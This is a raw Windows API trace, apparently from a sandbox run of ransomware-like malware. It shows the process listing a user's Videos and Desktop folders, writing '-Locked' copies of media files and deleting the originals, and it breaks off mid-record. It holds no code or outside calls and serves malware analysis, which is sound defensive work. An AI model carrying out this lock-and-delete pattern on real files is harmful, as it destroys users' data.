lpFindFileData=0x1aee44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485b6f60, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0xe9782b10, ftLastAccessTime.dwHighDateTime=0x1d7e3c8, ftLastWriteTime.dwLowDateTime=0xe9782b10, ftLastWriteTime.dwHighDateTime=0x1d7e3c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0304.328] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485b6f60, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0xe9782b10, ftLastAccessTime.dwHighDateTime=0x1d7e3c8, ftLastWriteTime.dwLowDateTime=0xe9782b10, ftLastWriteTime.dwHighDateTime=0x1d7e3c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0304.329] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9eca30, ftCreationTime.dwHighDateTime=0x1d7e438, ftLastAccessTime.dwLowDateTime=0x19bfaa30, ftLastAccessTime.dwHighDateTime=0x1d7e745, ftLastWriteTime.dwLowDateTime=0x19bfaa30, ftLastWriteTime.dwHighDateTime=0x1d7e745, nFileSizeHigh=0x0, nFileSizeLow=0x4826, dwReserved0=0x0, dwReserved1=0x0, cFileName="avX9IKgh.mp4", cAlternateFileName="")) returned 1 [0304.329] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3398ca80, ftCreationTime.dwHighDateTime=0x1d7de45, ftLastAccessTime.dwLowDateTime=0xbe841590, ftLastAccessTime.dwHighDateTime=0x1d7e4e5, ftLastWriteTime.dwLowDateTime=0xbe841590, ftLastWriteTime.dwHighDateTime=0x1d7e4e5, nFileSizeHigh=0x0, nFileSizeLow=0xea66, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPERAUjKKYfC9.mkv", cAlternateFileName="BPERAU~1.MKV")) returned 1 [0304.329] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b1128f0, ftCreationTime.dwHighDateTime=0x1d7e770, ftLastAccessTime.dwLowDateTime=0xf84f99d0, ftLastAccessTime.dwHighDateTime=0x1d7e782, ftLastWriteTime.dwLowDateTime=0xf84f99d0, ftLastWriteTime.dwHighDateTime=0x1d7e782, nFileSizeHigh=0x0, nFileSizeLow=0xe162, dwReserved0=0x0, dwReserved1=0x0, cFileName="C9b1z.avi", cAlternateFileName="")) returned 1 [0304.330] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93510d40, ftCreationTime.dwHighDateTime=0x1d7e53c, ftLastAccessTime.dwLowDateTime=0x7a431fa0, ftLastAccessTime.dwHighDateTime=0x1d7e6fe, ftLastWriteTime.dwLowDateTime=0x7a431fa0, ftLastWriteTime.dwHighDateTime=0x1d7e6fe, nFileSizeHigh=0x0, nFileSizeLow=0xa14b, dwReserved0=0x0, dwReserved1=0x0, cFileName="F sj97dzLd0j5xh.mp4", cAlternateFileName="FSJ97D~1.MP4")) returned 1 [0304.330] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x344c8210, ftCreationTime.dwHighDateTime=0x1d7dcf0, ftLastAccessTime.dwLowDateTime=0xf10169e0, ftLastAccessTime.dwHighDateTime=0x1d7e2a2, ftLastWriteTime.dwLowDateTime=0xf10169e0, ftLastWriteTime.dwHighDateTime=0x1d7e2a2, nFileSizeHigh=0x0, nFileSizeLow=0x7b70, dwReserved0=0x0, dwReserved1=0x0, cFileName="qnm0fu5.swf", cAlternateFileName="")) returned 1 [0304.330] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f6ce6d0, ftCreationTime.dwHighDateTime=0x1d7e5db, ftLastAccessTime.dwLowDateTime=0x79fbdad0, ftLastAccessTime.dwHighDateTime=0x1d7e769, ftLastWriteTime.dwLowDateTime=0x79fbdad0, ftLastWriteTime.dwHighDateTime=0x1d7e769, nFileSizeHigh=0x0, nFileSizeLow=0x1595b, dwReserved0=0x0, dwReserved1=0x0, cFileName="syhAMp2P7oE.flv", cAlternateFileName="SYHAMP~1.FLV")) returned 1 [0304.331] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32a52890, ftCreationTime.dwHighDateTime=0x1d7df3e, ftLastAccessTime.dwLowDateTime=0x2f75bf80, ftLastAccessTime.dwHighDateTime=0x1d7e71e, ftLastWriteTime.dwLowDateTime=0x2f75bf80, ftLastWriteTime.dwHighDateTime=0x1d7e71e, nFileSizeHigh=0x0, nFileSizeLow=0xf864, dwReserved0=0x0, dwReserved1=0x0, cFileName="y2cTfXCEKtMuyCJVAqX.mkv", cAlternateFileName="Y2CTFX~1.MKV")) returned 1 [0304.331] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32a52890, ftCreationTime.dwHighDateTime=0x1d7df3e, ftLastAccessTime.dwLowDateTime=0x2f75bf80, ftLastAccessTime.dwHighDateTime=0x1d7e71e, ftLastWriteTime.dwLowDateTime=0x2f75bf80, ftLastWriteTime.dwHighDateTime=0x1d7e71e, nFileSizeHigh=0x0, nFileSizeLow=0xf864, dwReserved0=0x0, dwReserved1=0x0, cFileName="y2cTfXCEKtMuyCJVAqX.mkv", cAlternateFileName="Y2CTFX~1.MKV")) returned 0 [0304.331] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0304.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0304.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0304.332] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\avX9IKgh.mp4-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\avX9IKgh.mp4-Locked", lpFilePart=0x0) returned 0x3f [0304.332] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0304.332] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\avX9IKgh.mp4-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\avx9ikgh.mp4-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.333] GetFileType (hFile=0x49c) returned 0x1 [0304.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0304.333] GetFileType (hFile=0x49c) returned 0x1 [0304.335] CloseHandle (hObject=0x49c) returned 1 [0304.335] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\avX9IKgh.mp4", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\avX9IKgh.mp4", lpFilePart=0x0) returned 0x38 [0304.335] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\avX9IKgh.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\avx9ikgh.mp4")) returned 1 [0304.367] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\bPERAUjKKYfC9.mkv-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\bPERAUjKKYfC9.mkv-Locked", lpFilePart=0x0) returned 0x44 [0304.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0304.368] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\bPERAUjKKYfC9.mkv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\bperaujkkyfc9.mkv-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.368] GetFileType (hFile=0x49c) returned 0x1 [0304.368] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0304.368] GetFileType (hFile=0x49c) returned 0x1 [0304.370] CloseHandle (hObject=0x49c) returned 1 [0304.370] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\bPERAUjKKYfC9.mkv", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\bPERAUjKKYfC9.mkv", lpFilePart=0x0) returned 0x3d [0304.371] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\bPERAUjKKYfC9.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\bperaujkkyfc9.mkv")) returned 1 [0304.382] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\C9b1z.avi-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\C9b1z.avi-Locked", lpFilePart=0x0) returned 0x3c [0304.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0304.382] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\C9b1z.avi-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\c9b1z.avi-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.383] GetFileType (hFile=0x49c) returned 0x1 [0304.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0304.383] GetFileType (hFile=0x49c) returned 0x1 [0304.412] CloseHandle (hObject=0x49c) returned 1 [0304.412] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\C9b1z.avi", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\C9b1z.avi", lpFilePart=0x0) returned 0x35 [0304.413] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\C9b1z.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\c9b1z.avi")) returned 1 [0304.419] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\F sj97dzLd0j5xh.mp4-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\F sj97dzLd0j5xh.mp4-Locked", lpFilePart=0x0) returned 0x46 [0304.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0304.419] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\F sj97dzLd0j5xh.mp4-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\f sj97dzld0j5xh.mp4-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.419] GetFileType (hFile=0x49c) returned 0x1 [0304.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0304.420] GetFileType (hFile=0x49c) returned 0x1 [0304.421] CloseHandle (hObject=0x49c) returned 1 [0304.422] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\F sj97dzLd0j5xh.mp4", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\F sj97dzLd0j5xh.mp4", lpFilePart=0x0) returned 0x3f [0304.422] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\F sj97dzLd0j5xh.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\f sj97dzld0j5xh.mp4")) returned 1 [0304.483] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\qnm0fu5.swf-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\qnm0fu5.swf-Locked", lpFilePart=0x0) returned 0x3e [0304.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0304.484] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\qnm0fu5.swf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\qnm0fu5.swf-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.484] GetFileType (hFile=0x49c) returned 0x1 [0304.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0304.484] GetFileType (hFile=0x49c) returned 0x1 [0304.486] CloseHandle (hObject=0x49c) returned 1 [0304.486] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\qnm0fu5.swf", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\qnm0fu5.swf", lpFilePart=0x0) returned 0x37 [0304.486] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\qnm0fu5.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\qnm0fu5.swf")) returned 1 [0304.487] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\syhAMp2P7oE.flv-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\syhAMp2P7oE.flv-Locked", lpFilePart=0x0) returned 0x42 [0304.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0304.487] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\syhAMp2P7oE.flv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\syhamp2p7oe.flv-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.487] GetFileType (hFile=0x49c) returned 0x1 [0304.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0304.487] GetFileType (hFile=0x49c) returned 0x1 [0304.489] CloseHandle (hObject=0x49c) returned 1 [0304.490] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\syhAMp2P7oE.flv", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\syhAMp2P7oE.flv", lpFilePart=0x0) returned 0x3b [0304.490] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\syhAMp2P7oE.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\syhamp2p7oe.flv")) returned 1 [0304.493] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\y2cTfXCEKtMuyCJVAqX.mkv-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\y2cTfXCEKtMuyCJVAqX.mkv-Locked", lpFilePart=0x0) returned 0x4a [0304.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0304.493] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\y2cTfXCEKtMuyCJVAqX.mkv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\y2ctfxcektmuycjvaqx.mkv-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.494] GetFileType (hFile=0x49c) returned 0x1 [0304.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0304.494] GetFileType (hFile=0x49c) returned 0x1 [0304.496] CloseHandle (hObject=0x49c) returned 1 [0304.496] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\y2cTfXCEKtMuyCJVAqX.mkv", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\y2cTfXCEKtMuyCJVAqX.mkv", lpFilePart=0x0) returned 0x43 [0304.496] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\y2cTfXCEKtMuyCJVAqX.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\y2ctfxcektmuycjvaqx.mkv")) returned 1 [0304.505] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi", nBufferLength=0x105, lpBuffer=0x1aeca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi", lpFilePart=0x0) returned 0x2b [0304.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0f4) returned 1 [0304.505] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi"), fInfoLevelId=0x0, lpFileInformation=0x1af174 | out: lpFileInformation=0x1af174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485b6f60, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x35e55110, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35e55110, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0304.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0f0) returned 1 [0304.505] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi")) returned 0 [0304.506] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0304.506] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0304.506] CoTaskMemFree (pv=0x73f0b8) [0304.537] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0304.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af194) returned 1 [0304.537] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0304.537] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0304.537] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.*", lpFindFileData=0x1aeebc | out: lpFindFileData=0x1aeebc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34739eca, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34739eca, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0304.538] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34739eca, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34739eca, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0304.538] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x346f313f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x346f313f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x346f313f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked-Locked-Locked", cAlternateFileName="0AIH45~1.JPG")) returned 1 [0304.538] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34724090, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34724090, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34724090, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked-Locked-Locked", cAlternateFileName="4-0BKI~2.MKV")) returned 1 [0304.538] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0304.538] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327920f7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327920f7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3478e2f5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", cAlternateFileName="69811A~2.EXE")) returned 1 [0304.539] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a0a8d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a0a8d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a0a8d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked", cAlternateFileName="AUTORU~1.INF")) returned 1 [0304.539] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x32993524, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32993524, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0304.539] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x326a0563, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x326a0563, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x326a0563, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked", cAlternateFileName="BGQH9X~2")) returned 1 [0304.539] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a9438, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a9438, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a9438, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked", cAlternateFileName="CSI0AP~2.DOC")) returned 1 [0304.540] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327b56d2, ftCreationTime.dwHighDateTime=0x1d82250, 